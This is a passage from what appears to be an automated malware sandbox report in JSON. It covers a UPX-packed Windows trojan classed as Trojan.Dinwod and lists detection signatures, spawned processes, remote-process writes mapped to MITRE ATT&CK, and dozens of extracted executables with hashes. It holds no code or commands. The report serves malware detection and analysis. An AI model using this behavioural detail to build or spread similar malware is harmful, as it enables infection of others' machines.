\"7.97244478673\"\n \"dhtjtp.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"nfrbnh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"00068.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"840262.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4880662.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"28028.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"040202.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rtbxtx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"0228228.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"080844.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"046220.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"86682.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4042804.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"048424.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"802262.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"848084.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"0406488.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"vlhdl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rpnxll.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rrhrlx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"dpdrtr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"224404.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa\" has a section named \"UPX0\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa\" has a section named \"UPX1\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa\" has a section named \"UPX2\"\n \"pltvbn.exe\" has a section named \"UPX0\"\n \"pltvbn.exe\" has a section named \"UPX1\"\n \"pltvbn.exe\" has a section named \"UPX2\"\n \"npdthpv.exe\" has a section named \"UPX0\"\n \"npdthpv.exe\" has a section named \"UPX1\"\n \"npdthpv.exe\" has a section named \"UPX2\"\n \"dhtjtp.exe\" has a section named \"UPX0\"\n \"dhtjtp.exe\" has a section named \"UPX1\"\n \"dhtjtp.exe\" has a section named \"UPX2\"\n \"nfrbnh.exe\" has a section named \"UPX0\"\n \"nfrbnh.exe\" has a section named \"UPX1\"\n \"nfrbnh.exe\" has a section named \"UPX2\"\n \"00068.exe\" has a section named \"UPX0\"\n \"00068.exe\" has a section named \"UPX1\"\n \"00068.exe\" has a section named \"UPX2\"\n \"840262.exe\" has a section named \"UPX0\"\n \"840262.exe\" has a section named \"UPX1\"\n \"840262.exe\" has a section named \"UPX2\"\n \"4880662.exe\" has a section named \"UPX0\"\n \"4880662.exe\" has a section named \"UPX1\"\n \"4880662.exe\" has a section named \"UPX2\"\n \"28028.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (UID: 00000000-00005968)\n Spawned process \"24680.exe\" (UID: 00000000-00003744)\n Spawned process \"2428202.exe\" (UID: 00000000-00005964)\n Spawned process \"00062.exe\" (UID: 00000000-00005896)\n Spawned process \"njhfl.exe\" (UID: 00000000-00004296)\n Spawned process \"66840.exe\" (UID: 00000000-00004244)\n Spawned process \"60064.exe\" (UID: 00000000-00004340)\n Spawned process \"2288488.exe\" (UID: 00000000-00006120)\n Spawned process \"48866.exe\" (UID: 00000000-00004236)\n Spawned process \"xbxthhr.exe\" (UID: 00000000-00005860)\n Spawned process \"fhhxhtt.exe\" (UID: 00000000-00004460)\n Spawned process \"648042.exe\" (UID: 00000000-00003968)\n Spawned process \"80004.exe\" (UID: 00000000-00004168)\n Spawned process \"08446.exe\" (UID: 00000000-00004488)\n Spawned process \"28848.exe\" (UID: 00000000-00000692)\n Spawned process \"8240402.exe\" (UID: 00000000-00003564)\n Spawned process \"802848.exe\" (UID: 00000000-00003980)\n Spawned process \"4404864.exe\" (UID: 00000000-00003628)\n Spawned process \"dbhbvhd.exe\" (UID: 00000000-00004092)\n Spawned process \"xfllptv.exe\" (UID: 00000000-00003276)\n Spawned process \"pppjrfj.exe\" (UID: 00000000-00002472)\n Spawned process \"tjtvdt.exe\" (UID: 00000000-00002700)\n Spawned process \"428848.exe\" (UID: 00000000-00002420)\n Spawned process \"dtdld.exe\" (UID: 00000000-00004568)\n Spawned process \"bpxbh.exe\" (UID: 00000000-00003944)\n Spawned process \"tjjhnh.exe\" (UID: 00000000-00004492)\n Spawned process \"brpvfll.exe\" (UID: 00000000-00002416)\n Spawned process \"240248.exe\" (UID: 00000000-00003864)\n Spawned process \"20468.exe\" (UID: 00000000-00003656)\n Spawned process \"206828.exe\" (UID: 00000000-00002776)\n Spawned process \"xldxxbf.exe\" (UID: 00000000-00003596)\n Spawned process \"jjjhv.exe\" (UID: 00000000-00004048)\n Spawned process \"jfnlx.exe\" (UID: 00000000-00001844)\n Spawned process \"nbvdjp.exe\" (UID: 00000000-00003772)\n Spawned process \"rdrhhx.exe\" (UID: 00000000-00004364)\n Spawned process \"lxxvtvn.exe\" (UID: 00000000-00001796)\n Spawned process \"dtndd.exe\" (UID: 00000000-00004224)\n Spawned process \"rdjtrt.exe\" (UID: 00000000-00001740)\n Spawned process \"ntxjntx.exe\" (UID: 00000000-00004544)\n Spawned process \"bdxfltt.exe\" (UID: 00000000-00003264)\n Spawned process \"dvftv.exe\" (UID: 00000000-00001208)\n Spawned process \"djhpdbh.exe\" (UID: 00000000-00004540)\n Spawned process \"tbxtf.exe\" (UID: 00000000-00001228)\n Spawned process \"vxjvbn.exe\" (UID: 00000000-00004584)\n Spawned process \"pnxhn.exe\" (UID: 00000000-00003844)\n Spawned process \"4202648.exe\" (UID: 00000000-00003700)\n Spawned process \"rhxdb.exe\" (UID: 00000000-00004020)\n Spawned process \"262684.exe\" (UID: 00000000-00001292)\n Spawned process \"662068.exe\" (UID: 00000000-00000292)\n Spawned process \"26684.exe\" (UID: 00000000-00001472)\n Spawned process \"426882.exe\" (UID: 00000000-00002388)\n Spawned process \"2404242.exe\" (UID: 00000000-00001468)\n Spawned process \"0002860.exe\" (UID: 00000000-00003664)\n Spawned process \"82086.exe\" (UID: 00000000-00003220)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" wrote 32 bytes to a remote process \"C:\\24680.exe\" (Handle: 72)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" wrote 52 bytes to a remote process \"C:\\24680.exe\" (Handle: 72)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" wrote 4 bytes to a remote process \"C:\\24680.exe\" (Handle: 72)\n \"24680.exe\" wrote 32 bytes to a remote process \"C:\\2428202.exe\" (Handle: 68)\n \"24680.exe\" wrote 52 bytes to a remote process \"C:\\2428202.exe\" (Handle: 68)\n \"24680.exe\" wrote 4 bytes to a remote process \"C:\\2428202.exe\" (Handle: 68)\n \"2428202.exe\" wrote 32 bytes to a remote process \"C:\\00062.exe\" (Handle: 116)\n \"2428202.exe\" wrote 52 bytes to a remote process \"C:\\00062.exe\" (Handle: 116)\n \"2428202.exe\" wrote 4 bytes to a remote process \"C:\\00062.exe\" (Handle: 116)\n \"00062.exe\" wrote 32 bytes to a remote process \"C:\\njhfl.exe\" (Handle: 68)\n \"00062.exe\" wrote 52 bytes to a remote process \"C:\\njhfl.exe\" (Handle: 68)\n \"00062.exe\" wrote 4 bytes to a remote process \"C:\\njhfl.exe\" (Handle: 68)\n \"njhfl.exe\" wrote 32 bytes to a remote process \"C:\\66840.exe\" (Handle: 68)\n \"njhfl.exe\" wrote 52 bytes to a remote process \"C:\\66840.exe\" (Handle: 68)\n \"njhfl.exe\" wrote 4 bytes to a remote process \"C:\\66840.exe\" (Handle: 68)\n \"66840.exe\" wrote 32 bytes to a remote process \"C:\\60064.exe\" (Handle: 116)\n \"66840.exe\" wrote 52 bytes to a remote process \"C:\\60064.exe\" (Handle: 116)\n \"66840.exe\" wrote 4 bytes to a remote process \"C:\\60064.exe\" (Handle: 116)\n \"60064.exe\" wrote 32 bytes to a remote process \"C:\\2288488.exe\" (Handle: 68)\n \"60064.exe\" wrote 52 bytes to a remote process \"C:\\2288488.exe\" (Handle: 68)\n \"60064.exe\" wrote 4 bytes to a remote process \"C:\\2288488.exe\" (Handle: 68)\n \"2288488.exe\" wrote 32 bytes to a remote process \"C:\\48866.exe\" (Handle: 68)\n \"2288488.exe\" wrote 52 bytes to a remote process \"C:\\48866.exe\" (Handle: 68)\n \"2288488.exe\" wrote 4 bytes to a remote process \"C:\\48866.exe\" (Handle: 68)\n \"48866.exe\" wrote 32 bytes to a remote process \"C:\\xbxthhr.exe\" (Handle: 68)\n \"48866.exe\" wrote 52 bytes to a remote process \"C:\\xbxthhr.exe\" (Handle: 68)\n \"48866.exe\" wrote 4 bytes to a remote process \"C:\\xbxthhr.exe\" (Handle: 68)\n \"xbxthhr.exe\" wrote 32 bytes to a remote process \"C:\\fhhxhtt.exe\" (Handle: 68)\n \"xbxthhr.exe\" wrote 52 bytes to a remote process \"C:\\fhhxhtt.exe\" (Handle: 68)\n \"xbxthhr.exe\" wrote 4 bytes to a remote process \"C:\\fhhxhtt.exe\" (Handle: 68)\n \"fhhxhtt.exe\" wrote 32 bytes to a remote process \"C:\\648042.exe\" (Handle: 68)\n \"fhhxhtt.exe\" wrote 52 bytes to a remote process \"C:\\648042.exe\" (Handle: 68)\n \"fhhxhtt.exe\" wrote 4 bytes to a remote process \"C:\\648042.exe\" (Handle: 68)\n \"648042.exe\" wrote 32 bytes to a remote process \"C:\\80004.exe\" (Handle: 116)\n \"648042.exe\" wrote 52 bytes to a remote process \"C:\\80004.exe\" (Handle: 116)\n \"648042.exe\" wrote 4 bytes to a remote process \"C:\\80004.exe\" (Handle: 116)\n \"80004.exe\" wrote 32 bytes to a remote process \"C:\\08446.exe\" (Handle: 116)\n \"80004.exe\" wrote 52 bytes to a remote process \"C:\\08446.exe\" (Handle: 116)\n \"80004.exe\" wrote 4 bytes to a remote process \"C:\\08446.exe\" (Handle: 116)\n \"08446.exe\" wrote 32 bytes to a remote process \"C:\\28848.exe\" (Handle: 68)\n \"08446.exe\" wrote 52 bytes to a remote process \"C:\\28848.exe\" (Handle: 68)\n \"08446.exe\" wrote 4 bytes to a remote process \"C:\\28848.exe\" (Handle: 68)\n \"28848.exe\" wrote 32 bytes to a remote process \"C:\\8240402.exe\" (Handle: 116)\n \"28848.exe\" wrote 52 bytes to a remote process \"C:\\8240402.exe\" (Handle: 116)\n \"28848.exe\" wrote 4 bytes to a remote process \"C:\\8240402.exe\" (Handle: 116)\n \"8240402.exe\" wrote 32 bytes to a remote process \"C:\\802848.exe\" (Handle: 68)\n \"8240402.exe\" wrote 52 bytes to a remote process \"C:\\802848.exe\" (Handle: 68)\n \"8240402.exe\" wrote 4 bytes to a remote process \"C:\\802848.exe\" (Handle: 68)\n \"802848.exe\" wrote 32 bytes to a remote process \"C:\\4404864.exe\" (Handle: 68)\n \"802848.exe\" wrote 52 bytes to a remote process \"C:\\4404864.exe\" (Handle: 68)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e
https://hybrid-analysis.com/sample/5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e
Hybrid Analysis - Infostealers
{"size": 341455, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e", "sha256": "5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 110, "extracted_files": [{"name": "0024648.exe", "file_path": "C:\\0024648.exe", "file_size": 342227, "sha256": "f2159886bdc7eccea2b4d90607a8bc831681fa38501eefa86d83eef3228ead3c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "848066.exe (PID: 2528)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0086084.exe", "file_path": "C:\\0086084.exe", "file_size": 342356, "sha256": "c6fb2d0360ea2267422d36edff46f99564025a889ae56c69453190557f375670", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "22004.exe (PID: 1624)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0288086.exe", "file_path": "C:\\0288086.exe", "file_size": 342318, "sha256": "4b01107777b1b4c34a77ea5b5aee7f136bbf2558b6ae00bcff9614a55862233c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vvtbdn.exe (PID: 2836)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0600220.exe", "file_path": "C:\\0600220.exe", "file_size": 341767, "sha256": "2efa42ca80e233aefd48b70ba6fbb33f6221d1bfcf37bc507d600063110d7fae", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0600220.exe (PID: 3448)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0600240.exe", "file_path": "C:\\0600240.exe", "file_size": 341814, "sha256": "223501f87d80a014ea18d827ebf79a2880ca13f1ddc55d5d076953ed4fbb69eb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "266028.exe (PID: 4404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0802042.exe", "file_path": "C:\\0802042.exe", "file_size": 342119, "sha256": "a327be707e2023b428f6e3292245b77fcb41e1873958bdd1971433fa65721056", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0802042.exe (PID: 904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "22004.exe", "file_path": "C:\\22004.exe", "file_size": 342342, "sha256": "8d4234a10aef429dfe8f7573b58a08a092ea3a4cb17554fb12cee66598421e7b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "22004.exe (PID: 1624)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2262446.exe", "file_path": "C:\\2262446.exe", "file_size": 341780, "sha256": "5ce7ba63a718302cc8968477120a7cc48813611602e8ee4be758f6df62f4808c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0600220.exe (PID: 3448)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "266028.exe", "file_path": "C:\\266028.exe", "file_size": 341795, "sha256": "b85bf8482d8ec08043d36de6ee2ab737b0fa8d231a7af8b2b5162d95ca9e8b18", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2262446.exe (PID: 3728)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "40806.exe", "file_path": "C:\\40806.exe", "file_size": 341927, "sha256": "65620c758613ae062540770fa21e4fa9d062b617940f640ccda90bb127c689a0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "42600.exe (PID: 976)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "42442.exe", "file_path": "C:\\42442.exe", "file_size": 342100, "sha256": "14dca7e1f714a8c8537a9e379b6f971dabd8eda93e74c753d6c5025bc9f40fba", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "464220.exe (PID: 1240)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "42600.exe", "file_path": "C:\\42600.exe", "file_size": 341915, "sha256": "0ee8320f61451095988b75b0d6a332e0833a8dd7be29571938219d7321d302cc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "42600.exe (PID: 976)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "44680.exe", "file_path": "C:\\44680.exe", "file_size": 342242, "sha256": "5a41b0fe1474bb7cd878943d207f66b6d048f7c2dea1cc24a324d876f1c68b1a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "44680.exe (PID: 2812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "464220.exe", "file_path": "C:\\464220.exe", "file_size": 342082, "sha256": "4d4a8d0205674c4fcc9c925a85b7954f45848874ce6c3def92b97d4f2e8486b6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "868648.exe (PID: 1768)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4688248.exe", "file_path": "C:\\4688248.exe", "file_size": 342331, "sha256": "22a3330eaa8a23fc0491550c17d4e4d0ed7ac9118357f7ac10b2574dffbf9c6a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0288086.exe (PID: 3528)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4866828.exe", "file_path": "C:\\4866828.exe", "file_size": 341942, "sha256": "117d37993bd60f3a3ee7bdbb8ab5b6bc1636a23449b15e45a99efd0f9f9e166d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4866828.exe (PID: 2712)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6040442.exe", "file_path": "C:\\6040442.exe", "file_size": 341751, "sha256": "854a284e86d5309417057b40bd622950a6b75411e6aff9e5754ba4322786e395", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6040442.exe (PID: 2732)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "60486.exe", "file_path": "C:\\60486.exe", "file_size": 341903, "sha256": "cca06be0801104e9b2c13cbf49ae47b045959a02e69a11bdd4fac0c7c1eb8581", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fvnph.exe (PID: 4268)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "62046.exe", "file_path": "C:\\62046.exe", "file_size": 341952, "sha256": "194a7d9ee2a4919e217cb3cd93f653fa15ea5bd5b9c80559de6cbbb8ce88aae1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4866828.exe (PID: 2712)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "62242.exe", "file_path": "C:\\62242.exe", "file_size": 341532, "sha256": "d237d056b168a76b02a47204615ed6f2a2f4cd12897f80f8c71a39a291dafa32", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "68282.exe (PID: 6088)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "64660.exe", "file_path": "C:\\64660.exe", "file_size": 341640, "sha256": "5f23755ad0902d3048b086fe02af471ee67980817eed71b2919107baab3fc4e8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8224062.exe (PID: 5560)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "682244.exe", "file_path": "C:\\682244.exe", "file_size": 341739, "sha256": "1242aabd3ffeabc7e8ebee4acccdb643f62db6b997522fa5b4d164a31be3ee5e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jxtxdv.exe (PID: 3668)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "68282.exe", "file_path": "C:\\68282.exe", "file_size": 341521, "sha256": "ccc5d022304092b708530ac72af5835d0ae88ad3a7ff142b12ea9d47c89e0231", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xlbdxlx.exe (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8064042.exe", "file_path": "C:\\8064042.exe", "file_size": 341834, "sha256": "49b9f15310c6d70a707bab5c5f478aee7bf598077f0463b6ea52cbe90f32a6c8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8064042.exe (PID: 4408)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8224062.exe", "file_path": "C:\\8224062.exe", "file_size": 341629, "sha256": "1684ad0f402d2680f5c2c6897797a1c6262c14d1c1092abe1e1f09e9f728533f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8224062.exe (PID: 5560)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8446060.exe", "file_path": "C:\\8446060.exe", "file_size": 342048, "sha256": "52e7b89aeb6fb49eed96538ce0b7c26c990b1670317166aec740d306ef7597b5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "88806.exe (PID: 3176)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "848066.exe", "file_path": "C:\\848066.exe", "file_size": 342209, "sha256": "6d9241eb338edb853b98e336a8ddef067a13d06544a473ffe41ba7b1a1463df5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "848066.exe (PID: 2528)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "868648.exe", "file_path": "C:\\868648.exe", "file_size": 342067, "sha256": "106db25e400e5db9e705f85272003f2438a4c6c188bda099025e11412e96955d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "868648.exe (PID: 1768)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "88806.exe", "file_path": "C:\\88806.exe", "file_size": 342034, "sha256": "8e8810df0adf211784c470c5c667b41c1bc7571301c1fc56c964d8e30a587d97", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "88806.exe (PID: 3176)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bbhhn.exe", "file_path": "C:\\bbhhn.exe", "file_size": 341470, "sha256": "500ecd2e1bb82c15eb7a7529df042387a1d40ed28b1aa29185ff64b031ff88ff", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bbhhn.exe (PID: 5876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "btvxfh.exe", "file_path": "C:\\btvxfh.exe", "file_size": 341614, "sha256": "98f6e3a3c109c87317f2057e290ada745b44404f9ecc7bb2859f06e8d0921c5b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "btvxfh.exe (PID: 5976)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bvffnn.exe", "file_path": "C:\\bvffnn.exe", "file_size": 342398, "sha256": "535c5d535448cd009ecc3168e175b07f5d3838d27219334814121eccd44454b2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bvffnn.exe (PID: 3912)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dbhlfn.exe", "file_path": "C:\\dbhlfn.exe", "file_size": 342289, "sha256": "795251c7442675f498ed24d7ac47074d9a6435b1cd03aae674e9149aab10913c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dbhlfn.exe (PID: 4480)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dnppt.exe", "file_path": "C:\\dnppt.exe", "file_size": 341600, "sha256": "1123142dfc5280a2ffa190e5fe7be09b6f059b82af7b6da926935bc21beb3e56", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vdfxt.exe (PID: 6120)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fdfnr.exe", "file_path": "C:\\fdfnr.exe", "file_size": 342150, "sha256": "0845b162114d128df555fc6a1dc787c6ea9839616653120dbd388244949d2dab", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rttxj.exe (PID: 1000)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fplrrnr.exe", "file_path": "C:\\fplrrnr.exe", "file_size": 342380, "sha256": "ae4f78614027318a2527ec10d535e2c0489d73b512fe8a14dbbfcbaf309d1537", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fplrrnr.exe (PID: 3976)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fvnph.exe", "file_path": "C:\\fvnph.exe", "file_size": 341883, "sha256": "b61edbff8c85c38a45bea2dd8e12fdd61e244b0942ba04421b8830af05d7b195", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fvnph.exe (PID: 4268)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hppjr.exe", "file_path": "C:\\hppjr.exe", "file_size": 341845, "sha256": "829bb797c7ae65da42233e53f2d0f523de1470d230ff750b76eee3e9d6de5f22", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8064042.exe (PID: 4408)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jbdbn.exe", "file_path": "C:\\jbdbn.exe", "file_size": 341557, "sha256": "4ec1bd75ab774a61ca5fcf4ec449b6cfac0f9e4c848388f87d09cdf547e5ce90", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rbldl.exe (PID: 4224)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jjxfht.exe", "file_path": "C:\\jjxfht.exe", "file_size": 341865, "sha256": "37b07eff732f8b3cb9cab21d406399ff70f7655f5bf78042a53396845f156d82", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jjxfht.exe (PID: 3224)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jpdvr.exe", "file_path": "C:\\jpdvr.exe", "file_size": 341709, "sha256": "07fa7f88ffee7ffe9eb418b21cb2680b69056a82cb4ae95c3cab785b997d657e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jpdvr.exe (PID: 2896)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jxtxdv.exe", "file_path": "C:\\jxtxdv.exe", "file_size": 341725, "sha256": 